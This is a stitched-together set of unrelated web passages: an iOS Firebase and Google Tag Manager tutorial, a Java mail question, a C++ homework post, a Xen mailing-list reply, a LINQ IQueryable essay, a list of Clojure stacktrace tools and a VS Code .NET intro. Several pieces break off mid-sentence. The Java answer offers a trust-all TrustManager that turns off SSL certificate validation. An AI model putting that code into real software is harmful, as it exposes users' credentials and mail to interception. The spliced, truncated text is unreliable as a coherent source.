Before we run our app for the first time, let’s add some heart to it. Click Main.storyboard to open the visual editor for the application’s user interface.
Click the Object Library icon in the top bar of Xcode, and type
text in the search bar that appears. Drag-and-drop the Text Field item into the middle of the view.
Double-click the Text Field in the view, and type in
Hello World!. You can reposition the field if you wish - though it won’t make it any prettier. This is what it should look like:
Now that we’ve created a beautiful user interface, we can run the application. Choose a phone model, e.g. iPhone 6 from the device menu, and click the Play button to build the application and run the simulator.
It’s going to take a while for the application to start, but once it does, you’ll be able to see it in the emulator window (it’s a different application that starts so remember to switch to it).
Congratulations! You’ve built the iOS application we’ll use as the testbed in this article. In the next step, we’ll configure Firebase!
Step 2: Create a Firebase project
Here, I’ll recommend you follow the exact same steps as in the Android article. Open this link in a new browser tab to learn how to create the Firebase project. Once the project is created, switch back to this article.
Step 3: Deploy Firebase SDK in application
Once you have the project created, you’ll need to integrate it into your iOS application.
Click the iOS icon in the middle of the Project Overview dashboard.
In the iOS bundle ID field, copy-paste the Bundle identifier you can find in Xcode by first selecting your project, and then looking in the Identity section of the General tab of your project settings.
Give the app a nickname such as
My iOS App if you wish, and then click Register app.
In the next screen, download the GoogleService-Info.plist file, and then drag-and-drop it to the project directory in Xcode (the yellow folder). You should see a screen like this, so make sure to check all the options as in the example.
You should end up with the file within the project directory.
In the web browser, click Next when done.
Now you need to add the Firebase SDK to your project. To do that, you need to initialize a Podfile to manage your application’s dependencies.
Open the Terminal application, and browse to your project root, i.e. the directory which has the
My Project Name.xcodeproj file. In this directory, type this and hit enter:
sudo gem install cocoapods
It’s a super-user command, so you’ll need to input your admin password. This installs the latest version of Cocoapods, the dependency manager for iOS.
Once done, type this and hit enter:
pod init
If you now list the contents of the directory with
ls, you should see a new
Podfile listed among the files and folders.
Open the Podfile in a plain text editor. You can open it in Mac’s TextEdit by typing
open Podfile in the console while in the directory with the Podfile.
Under the
# Pods for <my project>, add the following two lines:
pod 'Firebase/Analytics' pod 'GoogleTagManager'
This is what it should look like:
Once done, save the file and close it.
Now, in the Terminal, while in the same directory as the Podfile, type the following command and press Enter.
pod install
You should see a bunch of dependencies being installed, including Firebase and Google Analytics / Tag Manager modules.
You should now see a new file in this directory, named
Your Project.xcworkspace. From now on, you’ll need to use this instead of the
Your Project.xcodeproj file when working on the project in Xcode. The workspace bundles the Pods you downloaded together with your project, and lets you build an application that includes all the modules you have indicated as dependencies.
So go ahead and close Xcode and the iOS simulator, and then re-open Xcode by opening the
Your Project.xcworkspace file.
If everything works as it should, you’ll now see both your project root and the Pods group in the project navigator.
Now, go back to the web browser with your Firebase SDK setup. As you’ve now added the SDK as a dependency, click the Next button.
The next step is to initialize the SDK in your application. Open Xcode, and then click the AppDelegate.swift class file to open it for editing.
Here, right after the
import UIKit statement, add the following line:
import Firebase
This imports the
Firebase set of modules. To initialize the Firebase SDK, add the following line of code into the
application method, just before the
return true statement:
FirebaseApp.configure()
This is what your AppDelegate.swift should look like after the changes.
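In code form, roughly this (a sketch; the template boilerplate may differ slightly between Xcode versions):

import UIKit
import Firebase

@UIApplicationMain
class AppDelegate: UIResponder, UIApplicationDelegate {
    var window: UIWindow?

    func application(_ application: UIApplication,
                     didFinishLaunchingWithOptions launchOptions: [UIApplication.LaunchOptionsKey: Any]?) -> Bool {
        FirebaseApp.configure() // initialize the Firebase SDK before returning
        return true
    }
}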
Next thing to do is to save your changes and run the application in a simulator. So pick a phone model from the drop-down and then click the Play button again.
The application itself won’t show anything has changed, but you might see some new, Firebase-related items in the Xcode logs.
Note! You can also filter for
GoogleTagManagerto see evidence that the GTM dependency has loaded. However, since you don’t (yet) have a container added to the project, the only log will be a simple entry telling you that no container was found.
Once you’ve run the app and verified that Firebase is initialized, go back to the web browser to finish the SDK setup.
From the Add initialization code step, click Next to proceed to verification.
Now, if you’ve run your app in Xcode on a computer with internet access, this final step should shortly show a green checkmark to confirm you’ve initialized the Firebase SDK.
Nice work! Click Continue to console to finish the setup.
You now have a working Firebase installation running in your app. You can now actually visit Google Analytics, browser to your Firebase App + Web property for this project, and see your data in the StreamView report within.
However, let’s not get ahead of ourselves. In the next chapter we’ll add some Firebase event logging to the application!
Step 4: Add basic analytics to the application
Now, let’s add a simple Firebase event to our application.
Open the ViewController.swift class. This class controls the view (d’oh) where you added the “Hello World!” text to.
In this class, load the relevant Firebase dependency with the following import command added to the beginning of the file:
import FirebaseAnalytics
Next, at the end of the
viewDidLoad() function, add the following lines of code:
Analytics.logEvent(AnalyticsEventSelectContent, parameters: [
    AnalyticsParameterItemID: "my_item_id"
])
When you want to send events to Firebase Analytics, you use the
Analytics singleton and its
logEvent() method.
This method takes two arguments: the event name and a list of key-value pairs in a
parameters list.
For the event name, you can provide a custom name such as
"my_custom_event", or you can utilize the standard events suggested by Firebase by accessing them through the
AnalyticsEvent.* enumerated namespace.
For the key-value pairs in
parameters, you can again use a custom key name such as
"my_custom_key", or you can use the suggested parameter names by accessing them through the
AnalyticsParameter.* enum.
We are using the
AnalyticsEventSelectContent enum, which returns
select_content at runtime, and we are using the
AnalyticsParameterItemID key, which returns
item_id at runtime.
Here’s what the modified ViewController.swift should look like:
Step 5: Debug and verify everything works
Before you run the app again, you’ll need to add some verbose logging to the console. Choose Product -> Scheme -> Edit scheme from the menu bar.
In the Arguments Passed On Launch, click the plus (+) symbol to add a new argument, and name it
-FIRAnalyticsDebugEnabled. This is what it should look like:
Now, run the app again. In the console logs, you should find the
select_content event by either scrolling to it or filtering for the event name.
You can now also visit your Google Analytics reporting view for the App + Web property created for this project, and scroll to the DebugView report. This will automatically include all devices for which the
-FIRAnalyticsDebugEnabled flag has been set. You should find your device (maybe with an odd name, though) in the Debug Devices list, and you should see a stream of events in the DebugView, together with the new
select_content event you just created.
Before we’re done, let’s fork this Firebase Analytics hit using Google Tag Manager, and send the copy to a Universal Analytics endpoint!
Step 6: Create and download a Google Tag Manager container
First, make sure you have a valid Universal Analytics endpoint. You need to create a Web property with a Mobile App view. The latter is what collects hits sent from your application.
Once you have the tracking ID (
UA-XXXXX-Y) at hand, you can head on over to to create your new iOS container.
In Google Tag Manager, create a new container in one of your accounts, or create a new GTM account first.
Give the container a name, e.g. My Test Application, and choose iOS as the type. Click Create when ready.
Click New Tag to create a new tag. Choose Google Analytics: Universal Analytics as the tag type.
Select Event from the Track Type list.
Add something to the Category field, e.g. Test Event.
In the Action field, start typing
{{ and then choose New Variable from the list.
Choose Event Parameter as the variable type.
Keep Suggested Firebase Parameter checked, and choose item_id from the Event Parameter list.
Give the variable a name, e.g.
{{item_id}} and then click Save.
Back in the tag, check Enable overriding settings in this tag, and add the Google Analytics tracking code for the web property that will be receiving these hits (
UA-XXXXXX-Y).
Finally, click the Triggering panel to add a new trigger.
Click the blue plus (+) sign in the top right corner to create a new trigger.
Choose Custom as the trigger type.
Check Some Events under the This trigger fires on heading.
Set the condition to:
Event Name equals
select_content
Give the trigger a name (e.g.
select_content), and when happy with it, click Save.
Double-check to make sure your tag looks like the one below, and then click Save to return to the Google Tag Manager dashboard.
At this point, you are ready to publish the container, so click Submit in the top right corner, and then Publish in the overlay that opens.
Once the container has been published, you should see a version overview of the published version. Click the Download button in this screen to download the container JSON file.
Now, create a new folder named container in the root of your project (the directory with the
.xcodeproj and
.xcworkspace files as well as the
Podfile). Move the container JSON into this directory.
Next, open Xcode. With your project root selected in the navigator, choose File –> Add files to Your Project.
Find and select the container folder from your project root directory, and make sure the other options are checked as in the screenshot below. Click Add when ready.
Once ready, you can run your application, and it should load the default container you just added to the application, and then shortly after fetch the most recent container version over the network.
Note! It’s always a good idea to keep as fresh a container version as the default container stored with the application itself. Thus if there’s network lag impacting the fetch of a more recent container version, the fallback (the default container) would be as up-to-date as possible.
To be sure, you’ll need to debug the setup a little.
Step 7: Debug and test that Universal Analytics receives the hits
Xcode’s logs are a bit of a mess. However, if you’re not averse to scroll-and-search, you can find what you’re looking for. You can also type in text in the filter field to parse the logs, but it only returns matching rows and is not thus very helpful.
However, we can quickly see that Google Tag Manager found our container and was able to load it in the application,
In addition to that, by scrolling down we can see that a Universal Analytics hit was dispatched via Google Tag Manager, using the parameters we set for the
select_content event.
Finally, we can check the Real Time report of our mobile app view to confirm data is flowing in:
Debugging a mobile application is notoriously difficult. If you want to do it seriously, you might want to use a tool like Charles proxy, which creates a log stream of all the network requests dispatched by your mobile application. You don’t even need source code access to make it work!
Summary
As with my Android guide, this article should really be an introduction to iOS development, and not a full-blown tutorial.
The purpose is to give you the tools and confidence to start working with mobile app development. Understanding the capabilities and limitations of Firebase is fundamental to being able to fluently work with the ecosystem.
Working with mobile application development is far removed from web development. For starters, the IDEs, SDKs, and programming languages at your disposal are far more restrictive than the wild west that is the web browser.
Kotlin and Swift do not let you do all the crazy stuff you can do with JavaScript, and there are also restrictions what types of shenanigans can be executed at runtime (so no Custom HTML tags in mobile app containers).
Nevertheless, iOS development has its charms, and Xcode can be a great ally in the times when it’s not a complete pain in the butt.
The beauty of mobile application development is how quickly you can get started. You don’t need anything extravagant - just a machine capable of handling the virtual devices, some good tutorials, and a solid system such as Firebase picking up some of the slack.
As always, I’m looking forward to your feedback in the comments! I’m sure I’ll revisit Firebase many times in upcoming articles.
Source: https://www.simoahava.com/amp/analytics/ios-quickstart-google-analytics-firebase-tag-manager/
I am trying to write an SSL client that sends mail using the javax.mail API. The problem I am having is that the server requires that I use SSL, but the server is also configured with a non-standard SSL certificate. The web pages I have found say that I need to install the certificate into the trust store. I don't want to do that (I don't have the necessary permissions).
You need to create a fake TrustManager that accepts all certificates, and register it as a manager. Something like this:
public class MyManager implements com.sun.net.ssl.X509TrustManager {
    public boolean isClientTrusted(X509Certificate[] chain) {
        return true;
    }
    public boolean isHostTrusted(X509Certificate[] chain) {
        return true;
    }
    ...
}

com.sun.net.ssl.TrustManager[] managers =
    new com.sun.net.ssl.TrustManager[] { new MyManager() };
com.sun.net.ssl.SSLContext context =
    com.sun.net.ssl.SSLContext.getInstance("SSL");
context.init(null, managers, new SecureRandom());
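Note that com.sun.net.ssl is the legacy JSSE API. With the modern javax.net.ssl classes the same idea looks like the sketch below — and since accepting every certificate disables verification entirely, treat it as a testing-only workaround:

import javax.net.ssl.*;
import java.security.SecureRandom;
import java.security.cert.X509Certificate;

TrustManager[] trustAll = new TrustManager[] {
    new X509TrustManager() {
        public void checkClientTrusted(X509Certificate[] chain, String authType) {}
        public void checkServerTrusted(X509Certificate[] chain, String authType) {}
        public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    }
};

SSLContext ctx = SSLContext.getInstance("TLS");
ctx.init(null, trustAll, new SecureRandom());
// Hand ctx.getSocketFactory() to the mail session, e.g. via the
// "mail.smtp.ssl.socketFactory" session property in JavaMail.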
Source: https://codedump.io/share/wrqaIUPLzm9l/1/is-it-possible-to-get-java-to-ignore-the-quottrust-storequot-and-just-accept-whatever-ssl-certificate-it-gets
Hi Everyone
I've just started a C++ programming class and I need to write a program to total up one day's worth of bank activity with a small percentage, but I don't know where to even start. Here's the problem summary:
The Silly Savings and Loan Company just opened up with a cash balance of $1000, and a plan to get rich. Their plan to make money is simple. They will charge no fee for checks, and a 3% fee for all deposits. You will write a program for them. They will run your program and enter deposits as positive numbers, and checks as negative numbers. All transactions will be recorded in the order they happen. When they run out of things to enter at the end of the day, they will enter a value of 0 to stop the program.
The program needs to add up both sets of numbers (deposits and checks) and figure out the amount of cash they should have at the end of the day. For every deposit, the 3% fee will be removed from the amount actually deposited, that amount will be added in to the profit they expect to make.
Once the data entry has been completed, the program will print out the total amount of checks written (as a positive number), the total amount of deposits received, the amount of cash they should have on hand, and the total profit earned that day.
Here are the transactions for their first day of operation:
Deposit 100.00
Check 500.00
Deposit 250.00
Deposit 25.00
Check 75.50
Deposit 27.50
Check 775.27
I started some code with the help of a friend, but I don't think it is correct. Can someone help me?
Here is what I had written before, though I don't really understand what I have done.
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
double 0.0;
double fee;
double checks;
double deposits;
double balance;
double balance = balance + checks+ deposists;
cout << "balance: ";
cin >> checks, depsits
system("PAUSE");
return 0;
}
Please! Any help would be greatly appreciated
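For reference, a hedged sketch of one way the requirements could be met (variable names are invented; it reads transactions until 0 and treats the 3% deposit fee as the bank's profit):

#include <iostream>
using namespace std;

int main() {
    double deposits = 0.0, checks = 0.0, profit = 0.0;
    double amount;

    cout << "Enter transactions (deposits positive, checks negative, 0 to stop):\n";
    while (cin >> amount && amount != 0.0) {
        if (amount > 0) {
            deposits += amount;
            profit   += amount * 0.03;   // 3% fee on every deposit
        } else {
            checks   += -amount;         // record checks as a positive total
        }
    }

    double cash = 1000.0 + deposits - checks; // opening balance plus the day's flow

    cout << "Total checks written:    " << checks   << "\n"
         << "Total deposits received: " << deposits << "\n"
         << "Cash on hand:            " << cash     << "\n"
         << "Profit earned:           " << profit   << "\n";
    return 0;
}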
Source: http://forums.codeguru.com/showthread.php?516816-Simple-Bank-Code-Problem&p=2035870&mode=threaded
On Thu, 2 Sep 2010, Jeremy Fitzhardinge wrote:
> On 08/30/2010 04:20 AM, Stefano Stabellini wrote:
> > Hi all,
> > this.
> > This series is based on Konrad's pcifront series (not upstream yet):
> >
> >
> > and requires a patch to xen and a patch to qemu-xen (just sent to
> > xen-devel).
>
> My only concern with this series is the pirq remapping stuff. Why do
> pirq and irq need to be non-identical? Is it because pirq is a global
> namespace, and dom0 has already assigned it?
>
> Why do guests need to know about max pirq? Would it be better to make
> Xen use a more dynamic structure for pirqs so that any arbitrary value
> can be used?

No, pirq is a per-domain namespace, but pirq and irq are conceptually
different: pirqs are used by xen as a reference for interrupts of
devices assigned to the guest, while linux uses irqs for its
internal purposes.
The pirq namespace is chosen by xen while the linux irq namespace is
chosen by linux.
Linux is allowed to choose the pirq number it wants when mapping an
interrupt; this is why linux needs to know the max pirq, so that it can
safely choose a pirq that is in the allowed range.
The difference between pirqs and linux irqs increases when we talk about
PV on HVM guests: in this case qemu also maps interrupts in the guests,
getting pirqs in return, so the linux kernel has to be able to cope with
already assigned pirq numbers.
The current PHYSDEVOP_map_pirq interface is already flexible enough for
that because it provides the possibility for the caller to let xen
choose the pirq, something that linux never does in the pure PV case,
but it is still possible. Obviously if you let xen choose the pirq
number you are safe from conflicts, but you must be able to cope with
pirq numbers different from linux irq numbers.
Bart De Smet's on-line blog (0x2B | ~0x2B, that's the question)
Recently I delivered a talk at TechEd South Africa on “Custom LINQ Providers”. This is a very broad topic to cover in barely 60 minutes especially if one has to explain pretty “abstract” pieces of art like IQueryable<T>. Apparently I managed to do so looking at the scores <g>. But why is IQueryable<T> such a special specimen? This post will explain why.
Well, not that much: I and Queryable. “I” means there’s work to do if you want to use it – that’s precisely what interfaces are all about (the Imperative form of to Implement). “Queryable” is the promise of the interface – what we’ll get in return for the “I” labor.
So, what would you guess that needs to be implemented to get query capabilities in return? A blind guess would be: every query operator? Looking at all of the query operators we support with all their fancy overloads, that would mean 126 methods. Framework designers are sometimes masochistic but to such a large extent? Nah! There’s a magic threshold for interfaces which I would conservatively set to 10 methods. If you go beyond that threshold, only masochistic framework users will care to (try to) implement your interface. People have come up with brilliant (hmm) ideas to reduce the burden of interface implementation by trading the problem for another set of problems: abstract base classes. Right, we only have 47 distinct query operators and additional overloads can do with a default implementation in quite some cases, but still 47 abstract methods is way too much especially if most implementors will only be interested in a few of them, so you get a sparse minestrone soup with floating NotImplementedExceptions everywhere. And you’re facing the restrictions of the runtime with respect to single inheritance only, which is one of the reasons I don’t believe that much in abstract base classes as extensibility points (although there are cases where these work great).
We need something better. What about the silver bullet (hmm) to all complexity problems: refactoring? Oh yeah, we could have 47 interfaces each with a few methods (all having the same name since they would be overloads) with exciting names like IWhereable, ISelectable, IOrderable, IGroupable, etc. If it doesn’t scale against one axis, what about pivoting the whole problem and make it again not scale against the orthogonal axis? We’ve gained nothing really. Maybe there’s yet a better idea.
Time to step back a little. Remember the original promise of the interface? You implement me and I give you something with “queryable” characteristics in return. However, for ages the typical way of delivering on such a promise was symmetric to the implementation. It was really all about: “I know – but only abstractly – how to use something but only if you concretize that something for me.”. Hence interfaces for say serialization have predictable members like Serialize and Deserialize. And yes, the interface delivers on its promise of marking something that can do serialization as such but in a rather lame and predictable way. So what if we could deliver on the “queryable” promise without putting the burden of implementing all query operators directly on the implementor? This is where interfaces can also be “asymmetric” concerning their promise versus their implementation cost. (If I were in a really philosophical mood, I could start derailing the conversation introducing parallels with concave, convex and regular mirrors. Let’s not do this.) But how…?
In order to have useful query capabilities we really need two things: a way to capture what the query means (the operators applied and their arguments), and a way to execute it and enumerate over the results.

From the latter promise we can already infer that IQueryable<T> ought to implement IEnumerable<T>, which makes our outstanding balance for the "implementor frustration threshold" (IFT for acronym lovers) two: a generic and non-generic equivalent of GetEnumerator:
interface IQueryable<T> : IEnumerable<T> { }
For the former promise we already came to the conclusion that it would be unreasonable to require 47 methods or so to be implemented (btw, that would also mean that in subsequent releases of LINQ, new query operators would have to go in an IQueryable2<T> interface since interfaces do not scale well on the versioning axis – remember COM?). So what if we could do all the heavy lifting for you, just giving you one piece of information that represents an entire query. That’s what expression trees are capable of doing. Now we end up with one more member to IQueryable<T>:
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } }
Conceptually, we could stop here. You have an expression tree that can represent an entire query (but how does it get there?) and you have a method that demands (where lazy becomes eager) you to start iterating over the results. The two query capability requirements have been fulfilled. Oh, and it’s quite predictable how the GetEnumerator would work, right? Take the expression tree, translate it into a Domain Specific Query Language (DSQL if you will), optionally cache it, send it to whatever data store you’re about to query, fetch the results, new up objects and yield them back.
I already raised the question about where the expression tree property’s value comes from. The answer is we need a bit of collaboration from you, the implementor, through a property called QueryProvider:
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } IQueryProvider QueryProvider { get; } }
An IQueryProvider is an object that knows how to create IQueryable objects, much like a factory. However, at certain points in time we’ll want you to do a different thing: instead of creating a new IQueryable, we might want you to execute a query on request (for example when you’re applying the First() query operator, eager evaluation results and we’ll need a way to kindly ask you for the value returned by the query):
interface IQueryProvider { IQueryable<T> CreateQuery<T>(Expression ex); T Execute<T>(Expression ex); }
How lame you might think: it’s just asking me to create the IQueryable<T> on LINQ’s behalf. Yes, but you can carry out whatever tricks you need (such as propagating some connection information needed to connect to a database) inside the CreateQuery implementation. Oh, and both methods above have non-generic counterparts.
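Before moving on, here's a minimal sketch (mine, not the post's) of what such a Table<T> and its provider could look like. Two caveats: in the interfaces that actually shipped, the provider property is named Provider rather than QueryProvider, and a real Execute would translate the expression tree instead of throwing.

using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;

class Table<T> : IQueryable<T>
{
    public Table() { Provider = new TableProvider(); Expression = Expression.Constant(this); }
    internal Table(IQueryProvider provider, Expression expression) { Provider = provider; Expression = expression; }

    public Type ElementType { get { return typeof(T); } }
    public Expression Expression { get; private set; }
    public IQueryProvider Provider { get; private set; }

    public IEnumerator<T> GetEnumerator()
    {
        // Hand the accumulated expression tree to the provider for execution.
        return Provider.Execute<IEnumerable<T>>(Expression).GetEnumerator();
    }

    IEnumerator IEnumerable.GetEnumerator() { return GetEnumerator(); }
}

class TableProvider : IQueryProvider
{
    public IQueryable<TElement> CreateQuery<TElement>(Expression expression)
    {
        // Called by Queryable.Where, Select, etc.: wrap the extended tree in a new queryable.
        return new Table<TElement>(this, expression);
    }

    public IQueryable CreateQuery(Expression expression) { throw new NotImplementedException(); }

    public TResult Execute<TResult>(Expression expression)
    {
        // A real provider translates the tree into its DSQL here; this sketch doesn't.
        throw new NotImplementedException("Translate and execute the expression tree here.");
    }

    public object Execute(Expression expression) { throw new NotImplementedException(); }
}

With this in place, new Table<Product>().Where(p => p.Price > 100) compiles and builds up the expression tree; only the execution side remains to be filled in.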
In addition to the two properties and two methods above, there’s one last property I should mention for completeness: ElementType. The idea of this property is to expose the type of the entities being queried. Why do we need this? Is IQueryable<T> not telling enough, namely T? Indeed, there’s even such a remark in the MSDN documentation:
The ElementType property represents the "T" in IQueryable<T> or IQueryable(Of T).
The reason we still have ElementType is for non-generic cases. For example, you might want to target a data store that doesn’t have an extensible schema, so you don’t need a generic parameter ‘T’. Instead, the type of the data returned by the provider is baked in, and ElementType is the way to retrieve that underlying type.
Finally, we end up with the following definition of IQueryable<T>:
interface IQueryable<T> : IEnumerable<T> { Expression Expression { get; } IQueryProvider QueryProvider { get; } Type ElementType { get; } }
All of this might still look fancy, so let’s turn to the consumer side to clarify things. That’s were the asymmetry becomes really apparent.
Let’s assume for a minute we have some Table<T> class that implements IQueryable<T>:
var products = new Table<Product>();
Given our derived interface definition for IQueryable<T> we don't really get much "query capabilities", do we? Right, we can ask this instance for things like ElementType (which really will be typeof(T)) and fairly abstract notions of Expression and QueryProvider. But no way do we have query operators such as Where and Select available already. However, as you'll know by now, LINQ relies on such operators. Indeed, take a look at the following query:
var products = new Table<Product>(); var res = from p in products where p.Price > 100 select p.Name;
The way this gets translated by the compiler looks as follows:
Table<Product> products = new Table<Product>(); var res = products.Where(p => p.Price > 100).Select(p => p.Name);
but where’s the Where? The answer lies in extension methods of course. Once we have System.Linq in scope, a (static) class called Queryable is in reach which exposes extension methods for IQueryable<T>. This is precisely why IQueryable<T> deserves the title of “funny interface” since it’s most likely the first interface that has been designed with a split view in mind. On the one hand, there’s the real “interface interface”, i.e. in CLR terms. But on top of that, extension methods provide the really useful interface functionality and act virtually as default method implementations in interfaces. That is, you don’t need to implement a whole bunch of query operator methods to get their functionality.
So, how do those methods work? Before going there, what about refreshing our mind on the LINQ to Objects implementation of those operators, as defined in System.Linq.Enumerable as extension methods on IEnumerable<T>. Just to pick one, consider Where:
static IEnumerable<T> Where<T>(this IEnumerable<T> source, Func<T, bool> predicate) { foreach (T item in source) if (predicate(item)) yield return item; }
Note: I’ve omitted the (a little tricky to implement – why?) exception throwing code in case source or predicate are null; this is left as an exercise for the reader. Solutions can be found in.
Besides client-side execution using iterators, there are a few important things to notice. First, here we’re extending on IEnumerable<T>. Although IQueryable<T> implements IEnumerable<T>, LINQ to Objects operators won’t be used when applying query operators on an IQueryable<T> data source because the latter type is more specific. If one wants to switch to LINQ to Objects semantics, AsEnumerable<T>() can be called. The second important thing is the type of the second parameter (on the call side this will look like the first and only parameter because we’re looking at an extension method). It’s just a Func<T, bool>, which is a delegate. This triggers the compiler to create an anonymous method:
IEnumerable<Product> products = new List<Product>(); IEnumerable<string> res = products.Where(delegate (Product p) { return p.Price > 100; }).Select(delegate (Product p) { return p.Name; });
Now, switch to the IQueryable<T> counterpart defined in System.Linq.Queryable, ignoring the implementation for a second:
static IQueryable<T> Where<T>(this IQueryable<T> source, Expression<Func<T, bool>> predicate)
Obviously the return type and first parameter type are different, but more importantly is the different type for the predicate parameter. This time it’s an Expression<…> of that same delegate Func<T, bool> type. When the compiler tries to assign a lambda expression to such an Expression<T> it emits code to create an expression tree, representing the lambda’s semantics, at runtime:
IQueryable<Product> products = new Table<Product>(); ParameterExpression p = Expression.Parameter(typeof(Product), “p”); LambdaExpression <>__predicate = Expression.Lambda(Expression.Greater(Expression.Property(p, “Price”), Expression.Constant(100)), p); LambdaExpression <>__projection = Expression.Lambda(Expression.Property(p, “Name”), p); var res = products.Where(<>__predicate).Select(<>__projection);
So, we can already see how a LINQ query ends up as a chain of query operator method calls that are all implemented as extension methods on IQueryable<T> and take in their “function parameter” as an expression tree, so that interpretation and translation can be deferred till runtime. Indeed, an expression tree representing p => p.Price > 100 can easily be translated into a WHERE clause in SQL or whatever equivalent in another DSQL.
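As a toy illustration of that translation step (again my sketch, not code from this post, assuming System.Linq.Expressions is in scope), a tiny translator for exactly this shape of predicate could look like:

static string ToWhereClause(Expression e)
{
    switch (e.NodeType)
    {
        case ExpressionType.GreaterThan:
            // Binary comparison: translate both sides and join them.
            var b = (BinaryExpression)e;
            return ToWhereClause(b.Left) + " > " + ToWhereClause(b.Right);
        case ExpressionType.MemberAccess:
            return ((MemberExpression)e).Member.Name; // e.g. "Price"
        case ExpressionType.Constant:
            return ((ConstantExpression)e).Value.ToString(); // e.g. "100"
        default:
            throw new NotSupportedException(e.NodeType.ToString());
    }
}

Feeding it the Body of the lambda above yields "Price > 100", ready to be glued into "WHERE Price > 100". Production providers obviously handle many more node types and parameterize constants instead of inlining them.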
Remaining question is how System.Linq.Queryable.* methods are implemented. Obviously no iterators, there’s nothing that can be done client-side. Instead we want to end up with a giant expression tree representing a query, originating from a chain of query operator method calls:
products.Where(<>__predicate).Select(<>__projection)
The query above contains no less than 5 ingredients: the query source (products), the Where operator, the predicate handed to it, the Select operator, and the projection handed to that.
After executing the line of code above, we get an IQueryable<string> in return (a string because the projection maps the Product objects onto strings using p.Name), one that should contain all of the information outlined above. Breaking this down, products is an IQueryable<Product> and hence it has an Expression property representing point ‘1’ above – data about the query source. When applying Where to this, we take all existing query information (from the “left hand side of the .”) through the Expression property and add the knowledge we’re about to apply Where with a given predicate (point ‘2’ above), resulting in a new IQueryable<Product>. Finally, Select is applied, again taking the original information via the Expression property, extending it with “Select some projection”, resulting in a new IQueryable<string> in this case. To wrap up this sample, the code above creates no less than three distinct IQueryable<T> instances (that is, including “products” in this count).
A picture is worth a thousand words: (diagram of the three chained IQueryable<T> instances and their growing expression trees, omitted here)
Inside the implementation of Where<T>, we take the source's Expression property, wrap it in a new expression node representing the call to Where with the supplied predicate, and hand that extended tree to the source's query provider through CreateQuery, getting the new IQueryable<T> back.
Subsequent query operator calls, e.g. to Select<T,R>, will continue this process of taking the original query expression and building a new one out of it by extending it with information about the query operator and its arguments (e.g. the projection lambda expression).
Quite often, the recommendation for using extension methods is to use them only to “extend” (sealed) classes with helper methods, if you don’t have a way to extend those yourself. In other words, if you’re the owner of a class, you should consider extending the class’s functionality rather than using extension methods are your primary extension mechanism. This recommendation is absolutely correct. However, when dealing with (what I refer to as) “asymmetric” interfaces, extension methods offer an interesting – albeit advanced – capability to separate the bare minimum extensibility points (the real “CLR interface”) from the offered functionality (brought in scope – or “woven in” – through extension methods via a namespace import) to reduce the tension between interface creator and implementor. In this post, you’ve seen one of the pioneers employing this technique: IQueryable<T>. Before you even consider following this technique, think about all the options you have: pure interfaces (keeping the “implementor frustration threshold” in mind), abstract base classes (keeping the single inheritance restriction in mind) and extension method based interface asymmetry.
Enjoy!
Wrangling Clojure Stacktraces
How to live with Clojure's humongous stacktraces.
Clojure error messages and stacktraces are the number one most complained-about feature of Clojure. I agree they're bad. There are many levels of abstraction that the problem can exist in. For instance, it could be a reader error (syntax error), a type error (expecting a different type), an argument order/number error, etc. I wish I had a nice analysis showing you how to identify each type of error. But I don't!
What I do have is a bunch of resources. As a major problem in the Clojure language, rest assured that a lot of energy is spent on it. There are blog posts, stack overflow questions, utilities, and major work in the language. Here are some resources:
How To Understand Clojure Stacktraces And Error Messages
Christopher Bui has written a nice guide for beginners.
Clojure Stack Traces for the Uninitiated
Connor Mendenhall gives some beginner tips for reading stacktraces.
Prone
Prone is a cool middleware for Ring applications that catch exceptions and give them to you with a nice UI in the browser. It's one of the first things I add when starting a new web project.
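As an illustration (my sketch, assuming Prone is on the classpath), wiring it into a Ring app is a one-liner:

(require '[prone.middleware :as prone])

;; handler is your existing Ring handler
(def app (prone/wrap-exceptions handler))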
clj-stacktrace
This older library prints stacktraces in a better way. Clojure functions are converted to their namespace/name format instead of their canonical JVM name with dollar signs, and things are aligned to be more easily read.
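For example (my illustration; the exact alignment differs), a frame for a function my.app/parse-user shows up in a raw JVM trace under its munged class name, whereas clj-stacktrace prints the Clojure name:

my.app$parse_user.invoke (app.clj:3)   ; raw JVM frame (munged class name)
my.app/parse-user (app.clj:3)          ; clj-stacktrace rendering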
Clojure Error Message Catalog
This is a project to document error messages in Clojure with their interpretations and solutions. It is similar to the Elm version.
clojure.spec
clojure.spec, due out in Clojure 1.9, promises to make a lot of error messages much better. A lot of the difficulty with error messages in Clojure is that there are macros (yet another layer of abstraction). clojure.spec gives you a way to parse macros (and other syntax) with much better error messages.
For a preview of how spec will help, check out Illuminated Macros and Improving Clojure's Error Messages with Grammars, which came out before spec but use similar solutions.
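As a small taste (my sketch, using the clojure.spec.alpha API from the 1.9 previews; the output format may differ by version):

(require '[clojure.spec.alpha :as s])

(s/def ::age pos-int?)
(s/explain ::age -3)
;; prints something like: val: -3 fails spec: ::age predicate: pos-int?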
Conclusion
With spec, I am very optimistic about Clojure error messages. In the next five years, I can see them getting really good. In the meantime, Clojure error messages are just something you'll have to learn how to read.
I wish I could wave a wand and give you all of the experience needed to read error messages. Error messages are a problem in many languages and Clojure's follow that tradition 🙂
If you're interested in learning Clojure, don't be discouraged by the error message. Nor should the JVM scare you off. That's why I created the JVM Fundamentals for Clojure course. It's over five hours of video teaching lots of things from my experience with the JVM that I still use with Clojure.
That's the end of this course!
Rock on!
Eric
When .Net Core came out there was a lot of excitement about the idea of developing .Net code outside of Windows.
The IDE of choice for .Net, Visual Studio, is and probably will always be a Windows-only program.
There are alternatives though, and today it is possible to fully develop an ASP.NET Core application outside of Windows.
In this blog post we will be looking into that, specifically in Linux.
Please note that all of the tooling described here is cross-platform; everything in this post will work on any platform that supports .Net Core.
The IDE
The full version of Visual Studio is only available in Windows. However, there’s an alternative that has a somewhat confusing name: Visual Studio Code.
You might think that VS Code is an inferior version of the full Visual Studio product, but that is not the case.
VS Code is a different project altogether. It’s built using a different set of technologies and this brings some features that full VS doesn’t have, for example being easily extensible and customizable, and also less demanding in terms of resources.
VS Code offers the ability to extend its functionality by the installation of extensions. For C# you should install the C# extension. You don’t need to go through the trouble of looking for it though. When you open a project that has C#, Visual Studio Code will prompt you to install the C# extension if you don’t have it already.
